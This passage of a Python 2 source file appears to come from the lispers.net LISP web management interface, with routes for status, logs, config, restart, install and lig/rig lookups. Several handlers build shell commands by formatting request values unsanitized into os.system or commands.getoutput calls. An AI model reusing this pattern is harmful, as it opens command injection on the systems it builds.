ils = lisp.lisp_button("install LISP software", "/lisp/install/image")
rs = lisp.lisp_button("restart LISP subsystem", "/lisp/restart/verify")
output = "<center>{}{}{}{}{}{}{}</center><hr>".format(sc, dc, ac, cc,
lf, ils, rs)
#endif
sys_uptime = commands.getoutput("uptime")
uname = commands.getoutput("uname -pv")
main_version = lisp.lisp_version.replace("+", "")
#
# This is really broken. It returns twice as many CPUs than really on the
# machine (on MacOS).
#
cpu_count = multiprocessing.cpu_count()
i = sys_uptime.find(", load")
sys_uptime = sys_uptime[0:i]
elapsed = lisp.lisp_print_elapsed(lisp.lisp_uptime)
top = "Not available"
#
# Get LISP process status.
#
command = "ps auww" if lisp.lisp_is_macos() else "ps aux"
status = commands.getoutput( \
"{} | egrep 'PID|python lisp|python -O lisp' | egrep -v grep". \
format(command))
status = status.replace(" ", lisp.space(1))
status = status.replace("\n", "<br>")
#
# top on MacOS.
#
if (uname.find("Darwin") != -1):
cpu_count = cpu_count / 2
top = commands.getoutput("top -l 1 | head -50")
top = top.split("PID")
top = top[0]
#
# Massage the 'top' output so we can have one line per information
# line.
#
i = top.find("Load Avg")
j = top[0:i].find("threads")
processes = top[0:j+7]
top = processes + "<br>" + top[i::]
i = top.find("CPU usage")
top = top[0:i] + "<br>" + top[i::]
i = top.find("SharedLibs:")
top = top[0:i] + "<br>" + top[i::]
i = top.find("MemRegions")
top = top[0:i] + "<br>" + top[i::]
i = top.find("PhysMem")
top = top[0:i] + "<br>" + top[i::]
i = top.find("VM:")
top = top[0:i] + "<br>" + top[i::]
i = top.find("Networks")
top = top[0:i] + "<br>" + top[i::]
i = top.find("Disks")
top = top[0:i] + "<br>" + top[i::]
else:
#
# top on Fedora Linux.
#
lines = commands.getoutput("top -b -n 1 | head -50")
lines = lines.split("PID")
lines[1] = lines[1].replace(" ", lisp.space(1))
lines = lines[0] + lines[1]
top = lines.replace("\n", "<br>")
#endif
release_notes = commands.getoutput("cat release-notes.txt")
release_notes = release_notes.replace("\n", "<br>")
output += '''
<br><table align="center" border="1" cellspacing="3x" cellpadding="5x">
<tr>
<td width="20%"><i>LISP Subsystem Version:<br>
LISP Release {} Build Date:</i></td>
<td width="80%"><font face="Courier New">{}<br>
{}</font></td>
</tr>
<tr>
<td width="20%"><i>LISP Subsystem Uptime:<br>System Uptime:</i></td>
<td width="80%"><font face="Courier New">{}<br>
{}</font></td>
</tr>
<tr>
<td width="20%"><i>System Architecture:<br>
Number of CPUs:<font face="Courier New">{}{}</font></td>
<td width="80%"><font face="Courier New">{}</font></td>
</tr>
<tr>
<td width="20%" valign="top"><i>LISP Process Status:</i></td>
<td width="80%">
<div style="height: 100px; overflow: auto">
<font size="2" face="Courier New">{}</font></div></td>
</tr>
<tr>
<td width="20%" valign="top"><i>System Resource Utilization:</i></td>
<td width="80%">
<div style="height: 200px; overflow: auto">
<font face="Courier New">{}</font></td>
</tr>
<tr>
<td width="20%" valign="top"><i>Release Notes:</i></td>
<td width="80%">
<div style="height: 300px; overflow: auto">
<font size="2" face="Courier New">{}</font></div></td>
</tr>
</table>
'''.format(main_version, lisp.lisp_version, lisp_build_date, elapsed,
sys_uptime, lisp.lisp_space(1), cpu_count, uname, status, top,
release_notes)
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_show_conf_command
#
# Show configuration file.
#
@bottle.route('/lisp/show/conf')
def lisp_show_conf_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(bottle.static_file("lisp.config", root="./", mimetype="text/plain"))
#enddef
#
# lisp_show_diff_command
#
# Show configuration diff file.
#
@bottle.route('/lisp/show/diff')
def lisp_show_diff_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(bottle.static_file("lisp.config.diff", root="./",
mimetype="text/plain"))
#enddef
#
# lisp_archive_conf_command
#
# Save a copy of lisp.config in lisp.config.archive.
#
@bottle.route('/lisp/archive/conf')
def lisp_archive_conf_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
lisp.lisp_ipc_lock.acquire()
os.system("cp ./lisp.config ./lisp.config.archive")
lisp.lisp_ipc_lock.release()
output = "Configuration file saved to "
output = lisp.lisp_print_sans(output)
output += lisp.lisp_print_cour("./lisp.config.archive")
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_clear_conf_command
#
# Clear contents of the lisp.config file.
#
@bottle.route('/lisp/clear/conf')
def lisp_clear_conf_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
os.system("cp ./lisp.config ./lisp.config.before-clear")
lisp.lisp_ipc_lock.acquire()
lisp_core_cp_lisp_config()
lisp.lisp_ipc_lock.release()
output = "Configuration cleared, a backup copy is stored in "
output = lisp.lisp_print_sans(output)
output += lisp.lisp_print_cour("./lisp.config.before-clear")
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_clear_conf_verify_command
#
# Ask user if they really want to clear the config file.
#
@bottle.route('/lisp/clear/conf/verify')
def lisp_clear_conf_verify_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
output = "<br>Are you sure you want to clear the configuration?"
output = lisp.lisp_print_sans(output)
yes = lisp.lisp_button("yes", "/lisp/clear/conf")
cancel = lisp.lisp_button("cancel", "/lisp")
output += yes + cancel + "<br>"
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_get_port_on_command_line
#
# Figure out if the lisp-core.pyo process was started with a parameter. If so,
# it is the port number we use for bottle. We want to restart using the same
# parameters.
#
def lisp_get_port_on_command_line():
port = ""
for p in ["443", "-8080", "8080"]:
c = 'ps auxww | egrep "lisp-core.pyo {}" | egrep -v grep'.format(p)
output = commands.getoutput(c)
if (output == ""): continue
output = output.split("\n")[0]
output = output.split(" ")
if (output[-2] == "lisp-core.pyo" and output[-1] == p): port = p
break
#endfor
return(port)
#enddef
#
# lisp_restart_command
#
# Restart the LISP subsystem.
#
@bottle.route('/lisp/restart')
def lisp_restart_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
#
# Check to see if requiretty is in effect. If so, we can't sudo, so tell
# user.
#
line = commands.getoutput("egrep requiretty /etc/sudoers").split(" ")
if (line[-1] == "requiretty" and line[0] == "Defaults"):
output = "Need to remove 'requiretty' from /etc/sudoers"
output = lisp.lisp_print_sans(output)
return(lispconfig.lisp_show_wrapper(output))
#endif
lisp.lprint(lisp.bold("LISP subsystem restart request received", False))
#
# Check if we should start the process with 443 (or -8080) as the port
# number for the lisp-core should run on.
#
port = lisp_get_port_on_command_line()
#
# Build command and launch it in another process.
#
c = "sleep 1; sudo ./RESTART-LISP {}".format(port)
thread.start_new_thread(os.system, (c, ))
output = lisp.lisp_print_sans("Restarting LISP subsystem ...")
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_restart_verify_command
#
# Ask user if they really want to restart the LISP subsystem.
#
@bottle.route('/lisp/restart/verify')
def lisp_restart_verify_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
output = "<br>Are you sure you want to restart the LISP subsystem?"
output = lisp.lisp_print_sans(output)
yes = lisp.lisp_button("yes", "/lisp/restart")
cancel = lisp.lisp_button("cancel", "/lisp")
output += yes + cancel + "<br>"
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_install_command
#
# Install tgz file user supplied in html form.
#
@bottle.route('/lisp/install', method="post")
def lisp_install_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
image = bottle.request.forms.get("image_url")
if (image.find("lispers.net") == -1 or image.find(".tgz") == -1):
string = "Invalid install request for file {}".format(image)
lisp.lprint(lisp.bold(string, False))
output = lisp.lisp_print_sans("Invalid lispers.net tarball file name")
return(lispconfig.lisp_show_wrapper(output))
#endif
if (lisp.lisp_is_ubuntu()):
c = "python lisp-get-bits.pyo {} force 2>&1 > /dev/null".format(image)
else:
c = "python lisp-get-bits.pyo {} force >& /dev/null".format(image)
#endif
status = os.system(c)
image_file = image.split("/")[-1]
if (os.path.exists(image_file)):
release = image.split("release-")[1]
release = release.split(".tgz")[0]
output = "Install completed for release {}".format(release)
output = lisp.lisp_print_sans(output)
output += "<br><br>" + lisp.lisp_button("restart LISP subsystem",
"/lisp/restart/verify") + "<br>"
else:
string = lisp.lisp_print_cour(image)
output = "Install failed for file {}".format(string)
output = lisp.lisp_print_sans(output)
#endif
string = "Install request for file {} {}".format(image,
"succeeded" if (status == 0) else "failed")
lisp.lprint(lisp.bold(string, False))
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_install_get_image
#
# Ask user for tgz image to install.
#
@bottle.route('/lisp/install/image')
def lisp_install_get_image():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
string = lisp.lisp_print_sans("<br>Enter lispers.net tarball URL:")
output = '''
<form action="/lisp/install" method="post" style="display: inline;">
{}
<input type="text" name="image_url" size="75" required/>
<input type="submit" style="background-color:transparent;border-radius:10px;" value="Submit" />
</form><br>'''.format(string)
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_log_flows_command
#
# Touch file ./log-flows so we can have the user request a dump of the memory
# based flow log.
#
@bottle.route('/lisp/log/flows')
def lisp_log_flows_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
os.system("touch ./log-flows")
output = lisp.lisp_print_sans("Flow data appended to file ")
out = "<a href='/lisp/show/log/lisp-flow/100'>logs/lisp-flows.log</a>"
output += lisp.lisp_print_cour(out)
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_search_log_command
#
# Search the <num> tail lines of <name> and display in <hr> separated format
# with search keyword in red.
#
@bottle.route('/lisp/search/log/<name>/<num>/<keyword>')
def lisp_search_log_command(name = "", num = "", keyword = ""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
command = "tail -n {} logs/{}.log | egrep -B10 -A10 {}".format(num, name,
keyword)
output = commands.getoutput(command)
if (output):
occurences = output.count(keyword)
output = lisp.convert_font(output)
output = output.replace("--\n--\n", "--\n")
output = output.replace("\n", "<br>")
output = output.replace("--<br>", "<hr>")
output = "Found <b>{}</b> occurences<hr>".format(occurences) + output
else:
output = "Keyword {} not found".format(keyword)
#endif
#
# Highlight keyword in blue.
#
blue = "<font color='blue'><b>{}</b>".format(keyword)
output = output.replace(keyword, blue)
output = output.replace(keyword, keyword + "</font>")
output = lisp.lisp_print_cour(output)
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_search_log_command_input
#
# Get input form data for keyword to search on.
#
@bottle.post('/lisp/search/log/<name>/<num>')
def lisp_search_log_command_input(name = "", num=""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
keyword = bottle.request.forms.get("keyword")
return(lisp_search_log_command(name, num, keyword))
#enddef
#
# lisp_show_log_name_command
#
# Show trace log file.
#
@bottle.route('/lisp/show/log/<name>/<num>')
def lisp_show_log_name_command(name = "", num=""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
#
# Deafult to print out last 100 lines and convert to html bold.
#
if (num == ""): num = 100
header = '''
<form action="/lisp/search/log/{}/{}" method="post">
<i>Keyword search:</i>
<input type="text" name="keyword" />
<input style="background-color:transparent;border-radius:10px;" type="submit" value="Submit" />
</form><hr>
'''.format(name, num)
if (os.path.exists("logs/{}.log".format(name))):
output = commands.getoutput("tail -n {} logs/{}.log".format(num, name))
output = lisp.convert_font(output)
output = output.replace("\n", "<br>")
output = header + lisp.lisp_print_cour(output)
else:
a = lisp.lisp_print_sans("File")
aa = lisp.lisp_print_cour("logs/{}.log".format(name))
aaa = lisp.lisp_print_sans("does not exist")
output = "{} {} {}".format(a, aa, aaa)
#endif
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_debug_menu_command
#
# Turn on or off debug.
#
@bottle.route('/lisp/debug/<name>')
def lisp_debug_menu_command(name = ""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
#
# Process "disable all" separately.
#
if (name == "disable%all"):
data = lispconfig.lisp_get_clause_for_api("lisp debug")
if (data[0].has_key("lisp debug")):
new = []
for entry in data[0]["lisp debug"]:
key = entry.keys()[0]
new.append({ key : "no" })
#endfor
new = { "lisp debug" : new }
lispconfig.lisp_put_clause_for_api(new)
#endif
data = lispconfig.lisp_get_clause_for_api("lisp xtr-parameters")
if (data[0].has_key("lisp xtr-parameters")):
new = []
for entry in data[0]["lisp xtr-parameters"]:
key = entry.keys()[0]
if (key in ["data-plane-logging", "flow-logging"]):
new.append({ key : "no" })
else:
new.append({ key : entry[key] })
#endif
#endfor
new = { "lisp xtr-parameters" : new }
lispconfig.lisp_put_clause_for_api(new)
#endif
return(lispconfig.lisp_landing_page())
#endif
#
# Process enabling or disable debug logging for a single item.
#
name = name.split("%")
component = name[0]
yesno = name[1]
xtr_parms = ["data-plane-logging", "flow-logging"]
clause_name = "lisp xtr-parameters" if (component in xtr_parms) else \
"lisp debug"
data = lispconfig.lisp_get_clause_for_api(clause_name)
if (data[0].has_key(clause_name)):
new = {}
for entry in data[0][clause_name]:
new[entry.keys()[0]] = entry.values()[0]
if (new.has_key(component)): new[component] = yesno
#endfor
new = { clause_name: new }
lispconfig.lisp_put_clause_for_api(new)
#endif
return(lispconfig.lisp_landing_page())
#enddef
#
# lisp_clear_referral_command
#
# Send a clear command to a LISP component.
#
@bottle.route('/lisp/clear/<name>')
@bottle.route('/lisp/clear/etr/<etr_name>/<stats_name>')
@bottle.route('/lisp/clear/rtr/<rtr_name>/<stats_name>')
@bottle.route('/lisp/clear/itr/<itr_name>')
@bottle.route('/lisp/clear/rtr/<rtr_name>')
def lisp_clear_command(name = "", itr_name = '', rtr_name = "", etr_name = "",
stats_name = ""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
#
# Do various checks.
#
if (lispconfig.lisp_is_user_superuser(None) == False):
output = lisp.lisp_print_sans("Not authorized")
return(lispconfig.lisp_show_wrapper(output))
#endif
ipc = "clear"
if (name == "referral"):
process = "lisp-mr"
print_name = "Referral"
elif (itr_name == "map-cache"):
process = "lisp-itr"
print_name = "ITR <a href='/lisp/show/itr/map-cache'>map-cache</a>"
elif (rtr_name == "map-cache"):
process = "lisp-rtr"
print_name = "RTR <a href='/lisp/show/rtr/map-cache'>map-cache</a>"
elif (etr_name == "stats"):
process = "lisp-etr"
print_name = ("ETR '{}' decapsulation <a href='/lisp/show/" + \
"database'>stats</a>").format(stats_name)
ipc += "%" + stats_name
elif (rtr_name == "stats"):
process = "lisp-rtr"
print_name = ("RTR '{}' decapsulation <a href='/lisp/show/" + \
"rtr/map-cache'>stats</a>").format(stats_name)
ipc += "%" + stats_name
else:
output = lisp.lisp_print_sans("Invalid command")
return(lispconfig.lisp_show_wrapper(output))
#endif
#
# Send IPC to lisp-mr. Do not wait for a reply.
#
ipc = lisp.lisp_command_ipc(ipc, "lisp-core")
lisp.lisp_ipc(ipc, lisp_ipc_socket, process)
#
# Only touch lisp.config file if there are static map-cache entries.
#
exist = commands.getoutput("egrep 'lisp map-cache' ./lisp.config")
if (exist != ""):
os.system("touch ./lisp.config")
#endif
output = lisp.lisp_print_sans("{} cleared".format(print_name))
return(lispconfig.lisp_show_wrapper(output))
#enddef
#
# lisp_show_map_server_command
#
# Have the lisp-etr process show the map-server configuration.
#
@bottle.route('/lisp/show/map-server')
def lisp_show_map_server_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show map-server"))
#enddef
#
# lisp_show_database_command
#
# Have the lisp-etr process show the database-mapping configuration.
#
@bottle.route('/lisp/show/database')
def lisp_show_database_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show database-mapping"))
#enddef
#
# lisp_show_itr_map_cache_command
#
# Have the lisp-itr process show the map-cache.
#
@bottle.route('/lisp/show/itr/map-cache')
def lisp_show_itr_map_cache_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show itr-map-cache"))
#enddef
#
# lisp_show_itr_rloc_probing_command
#
# Have the lisp-itr process show the RLOC-probe list.
#
@bottle.route('/lisp/show/itr/rloc-probing')
def lisp_show_itr_rloc_probing_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show itr-rloc-probing"))
#enddef
#
# lisp_show_itr_map_cache_lookup
#
# Execute longest match lookup and return results.
#
@bottle.post('/lisp/show/itr/map-cache/lookup')
def lisp_show_itr_map_cache_lookup():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
eid_str = bottle.request.forms.get("eid")
if (lispconfig.lisp_validate_input_address_string(eid_str) == False):
output = "Address '{}' has invalid format".format(eid_str)
output = lisp.lisp_print_sans(output)
return(lispconfig.lisp_show_wrapper(output))
#endif
command = "show itr-map-cache" + "%" + eid_str
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
command))
#enddef
#
# lisp_show_rtr_map_cache_command
#
# Have the lisp-rtr process show the map-cache.
#
@bottle.route('/lisp/show/rtr/map-cache')
@bottle.route('/lisp/show/rtr/map-cache/<dns>')
def lisp_show_rtr_map_cache_command(dns = ""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
if (dns == "dns"):
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show rtr-map-cache-dns"))
else:
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show rtr-map-cache"))
#endif
#enddef
#
# lisp_show_rtr_rloc_probing_command
#
# Have the lisp-rtr process show the RLOC-probe list.
#
@bottle.route('/lisp/show/rtr/rloc-probing')
def lisp_show_rtr_rloc_probing_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show rtr-rloc-probing"))
#enddef
#
# lisp_show_rtr_map_cache_lookup
#
# Execute longest match lookup and return results.
#
@bottle.post('/lisp/show/rtr/map-cache/lookup')
def lisp_show_rtr_map_cache_lookup():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
eid_str = bottle.request.forms.get("eid")
if (lispconfig.lisp_validate_input_address_string(eid_str) == False):
output = "Address '{}' has invalid format".format(eid_str)
output = lisp.lisp_print_sans(output)
return(lispconfig.lisp_show_wrapper(output))
#endif
command = "show rtr-map-cache" + "%" + eid_str
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
command))
#enddef
#
# lisp_show_referral_command
#
# Have the lisp-mr show the DDT referral-cache.
#
@bottle.route('/lisp/show/referral')
def lisp_show_referral_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show referral-cache"))
#enddef
#
# lisp_show_referral_cache_lookup
#
# Execute longest match lookup and return results.
#
@bottle.post('/lisp/show/referral/lookup')
def lisp_show_referral_cache_lookup():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
eid_str = bottle.request.forms.get("eid")
if (lispconfig.lisp_validate_input_address_string(eid_str) == False):
output = "Address '{}' has invalid format".format(eid_str)
output = lisp.lisp_print_sans(output)
return(lispconfig.lisp_show_wrapper(output))
#endif
command = "show referral-cache" + "%" + eid_str
return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_delegation_command
#
# Have the lisp-mr show the DDT configured delegation information.
#
@bottle.route('/lisp/show/delegations')
def lisp_show_delegations_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket,
"show delegations"))
#enddef
#
# lisp_show_delegations_lookup
#
# Execute longest match lookup and return results.
#
@bottle.post('/lisp/show/delegations/lookup')
def lisp_show_delegations_lookup():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
eid_str = bottle.request.forms.get("eid")
if (lispconfig.lisp_validate_input_address_string(eid_str) == False):
output = "Address '{}' has invalid format".format(eid_str)
output = lisp.lisp_print_sans(output)
return(lispconfig.lisp_show_wrapper(output))
#endif
command = "show delegations" + "%" + eid_str
return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_site_command
#
# Have the lisp-ms process show the site registration information. Convert
# eid-prefix from format "<iid>-<eid>-<ml>" to "[<iid>]<eid>/<ml>" internal
# format. We need to do this because URLs should avoid square brackets.
#
@bottle.route('/lisp/show/site')
@bottle.route('/lisp/show/site/<eid_prefix>')
def lisp_show_site_command(eid_prefix = ""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
command = "show site"
if (eid_prefix != ""):
command = lispconfig.lisp_parse_eid_in_url(command, eid_prefix)
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_itr_dyn_eid_command
#
# Show dynamic-EIDs from the ITR's point of view.
#
@bottle.route('/lisp/show/itr/dynamic-eid/<eid_prefix>')
def lisp_show_itr_dyn_eid_command(eid_prefix = ""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
command = "show itr-dynamic-eid"
if (eid_prefix != ""):
command = lispconfig.lisp_parse_eid_in_url(command, eid_prefix)
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_dyn_eid_command
#
# Show dynamic-EIDs from the ITR's point of view.
#
@bottle.route('/lisp/show/etr/dynamic-eid/<eid_prefix>')
def lisp_show_dyn_eid_command(eid_prefix = ""):
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
command = "show etr-dynamic-eid"
if (eid_prefix != ""):
command = lispconfig.lisp_parse_eid_in_url(command, eid_prefix)
#endif
return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_show_site_lookup
#
# Execute longest match lookup and return results.
#
@bottle.post('/lisp/show/site/lookup')
def lisp_show_site_lookup():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
eid_str = bottle.request.forms.get("eid")
if (lispconfig.lisp_validate_input_address_string(eid_str) == False):
output = "Address '{}' has invalid format".format(eid_str)
output = lisp.lisp_print_sans(output)
return(lispconfig.lisp_show_wrapper(output))
#endif
command = "show site" + "%" + eid_str + "@lookup"
return(lispconfig.lisp_process_show_command(lisp_ipc_socket, command))
#enddef
#
# lisp_lig_command
#
# Do interactive lig.
#
@bottle.post('/lisp/lig')
def lisp_lig_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
eid = bottle.request.forms.get("eid")
mr = bottle.request.forms.get("mr")
count = bottle.request.forms.get("count")
no_nat = "no-info" if bottle.request.forms.get("no-nat") == "yes" else ""
#
# Default map-resolver to localhost.
#
if (mr == ""): mr = "localhost"
#
# Check for no input. User error.
#
if (eid == ""):
output = "Need to supply EID address"
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#endif
lig = ""
if os.path.exists("lisp-lig.pyo"): lig = "-O lisp-lig.pyo"
if os.path.exists("lisp-lig.py"): lig = "lisp-lig.py"
#
# Something went wrong with the install.
#
if (lig == ""):
output = "Cannot find lisp-lig.py or lisp-lig.pyo"
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#endif
if (count != ""): count = "count {}".format(count)
command = 'python {} "{}" to {} {} {}'.format(lig, eid, mr, count, no_nat)
output = commands.getoutput(command)
output = output.replace("\n", "<br>")
output = lisp.convert_font(output)
rloc = lisp.space(2) + "RLOC:"
output = output.replace("RLOC:", rloc)
empty = lisp.space(2) + "Empty,"
output = output.replace("Empty,", empty)
geo = lisp.space(4) + "geo:"
output = output.replace("geo:", geo)
elp = lisp.space(4) + "elp:"
output = output.replace("elp:", elp)
rle = lisp.space(4) + "rle:"
output = output.replace("rle:", rle)
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#enddef
#
# lisp_rig_command
#
# Do interactive rig.
#
@bottle.post('/lisp/rig')
def lisp_rig_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
eid = bottle.request.forms.get("eid")
ddt = bottle.request.forms.get("ddt")
follow_all = "follow-all-referrals" if \
bottle.request.forms.get("follow") == "yes" else ""
#
# Default ddt-node to localhost.
#
if (ddt == ""): ddt = "localhost"
#
# Check for no input. User error.
#
if (eid == ""):
output = "Need to supply EID address"
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#endif
rig = ""
if os.path.exists("lisp-rig.pyo"): rig = "-O lisp-rig.pyo"
if os.path.exists("lisp-rig.py"): rig = "lisp-rig.py"
#
# Something went wrong with the install.
#
if (rig == ""):
output = "Cannot find lisp-rig.py or lisp-rig.pyo"
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#endif
command = 'python {} "{}" to {} {}'.format(rig, eid, ddt, follow_all)
output = commands.getoutput(command)
output = output.replace("\n", "<br>")
output = lisp.convert_font(output)
ref = lisp.space(2) + "Referrals:"
output = output.replace("Referrals:", ref)
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#enddef
#
# lisp_run_geo_lig
#
# Do lookup on both supplied EIDs passed as input parameters and return
# a geo-point and geo-prefix if they are found in RLOC records.
#
def lisp_run_geo_lig(eid1, eid2):
lig = None
if os.path.exists("lisp-lig.pyo"): lig = "-O lisp-lig.pyo"
if os.path.exists("lisp-lig.py"): lig = "lisp-lig.py"
if (lig == None): return([None, None])
#
# First get a map-resolver addresss.
#
o = commands.getoutput("egrep -A 2 'lisp map-resolver {' ./lisp.config")
mr = None
for keyword in ["address = ", "dns-name = "]:
mr = None
index = o.find(keyword)
if (index == -1): continue
mr = o[index+len(keyword)::]
index = mr.find("\n")
if (index == -1): continue
mr = mr[0:index]
break
#endfor
if (mr == None): return([None, None])
#
# Lookup EIDs in loop.
#
addr = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
geos = []
for eid in [eid1, eid2]:
#
# Don't do lookups for Geo-Coordinates. Only for EIDs that are not
# in Geo-Coordinate format.
#
if (addr.is_geo_string(eid)):
geos.append(eid)
continue
#endif
command = 'python {} "{}" to {} count 1'.format(lig, eid, mr)
for cmd in [command, command + " no-info"]:
output = commands.getoutput(command)
index = output.find("geo: ")
if (index == -1):
if (cmd != command): geos.append(None)
continue
#endif
output = output[index+len("geo: ")::]
index = output.find("\n")
if (index == -1):
if (cmd != command): geos.append(None)
continue
#endif
geos.append(output[0:index])
break
#endfor
#endfor
return(geos)
#enddef
#
# lisp_geo_command
#
# Do geo lookups from lisp.lisp_geo() functions.
#
@bottle.post('/lisp/geo')
def lisp_geo_command():
if (lispconfig.lisp_validate_user() == False):
return(lisp_core_login_page())
#endif
eid = bottle.request.forms.get("geo-point")
eid_prefix = bottle.request.forms.get("geo-prefix")
output = ""
#
# If an EID in the form of an IP address or distinguish-name, run a
# lig to get record from mapping database to obtain the geo data.
#
gs = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
geo_point = lisp.lisp_geo("")
geo_prefix = lisp.lisp_geo("")
point, prefix = lisp_run_geo_lig(eid, eid_prefix)
#
# Check EID format if geo-coordiante or return geo-point from database
# lookup.
#
if (gs.is_geo_string(eid)):
if (geo_point.parse_geo_string(eid) == False):
output = "Could not parse geo-point format"
#endif
elif (point == None):
output = "EID {} lookup could not find geo-point".format(
lisp.bold(eid, True))
elif (geo_point.parse_geo_string(point) == False):
output = "Could not parse geo-point format returned from lookup"
#endif
#
# Geo-point is good, now check EID-prefix or geo-prefix format retunred
# from database lookup.
#
if (output == ""):
if (gs.is_geo_string(eid_prefix)):
if (geo_prefix.parse_geo_string(eid_prefix) == False):
output = "Could not parse geo-prefix format"
#endif
elif (prefix == None):
output = "EID-prefix {} lookup could not find geo-prefix".format( \
lisp.bold(eid_prefix, True))
elif (geo_prefix.parse_geo_string(prefix) == False):
output = "Could not parse geo-prefix format returned from lookup"
#endif
#endif
#
# No input errors. Return good results. Otherwise, error response in
# variable 'output'.
#
if (output == ""):
eid = "" if (eid == point) else ", EID {}".format(eid)
eid_prefix = "" if (eid_prefix == prefix) else \
", EID-prefix {}".format(eid_prefix)
point_str = geo_point.print_geo_url()
prefix_str = geo_prefix.print_geo_url()
km = geo_prefix.radius
dd_point = geo_point.dms_to_decimal()
dd_point = (round(dd_point[0], 6), round(dd_point[1], 6))
dd_prefix = geo_prefix.dms_to_decimal()
dd_prefix = (round(dd_prefix[0], 6), round(dd_prefix[1], 6))
distance = round(geo_prefix.get_distance(geo_point), 2)
inside = "inside" if geo_prefix.point_in_circle(geo_point) else \
"outside"
spo = lisp.space(2)
spe = lisp.space(1)
sd = lisp.space(3)
output = ("Geo-Point:{}{} {}{}<br>Geo-Prefix:{}{} {}, {} " + \
"kilometer radius{}<br>").format(spo, point_str, dd_point, eid,
spe, prefix_str, dd_prefix, km, eid_prefix)
output += "Distance:{}{} kilometers, point is {} of circle".format(sd,
distance, lisp.bold(inside, True))
#endif
return(lispconfig.lisp_show_wrapper(lisp.lisp_print_cour(output)))
#enddef
#
# lisp_get_info_source
#
# See if this source has sent an Info-Request and we are caching it so we
# can proxy Map-Request for it. Either address OR nonce can be supplied to
# determine if we are doing a lookup based on address or nonce.
#
def lisp_get_info_source(addr_str, port, nonce):
if (addr_str != None):
for info_source in lisp.lisp_info_sources_by_address.values():
info_source_str = info_source.address.print_address_no_iid()
if (info_source_str == addr_str and info_source.port == port):
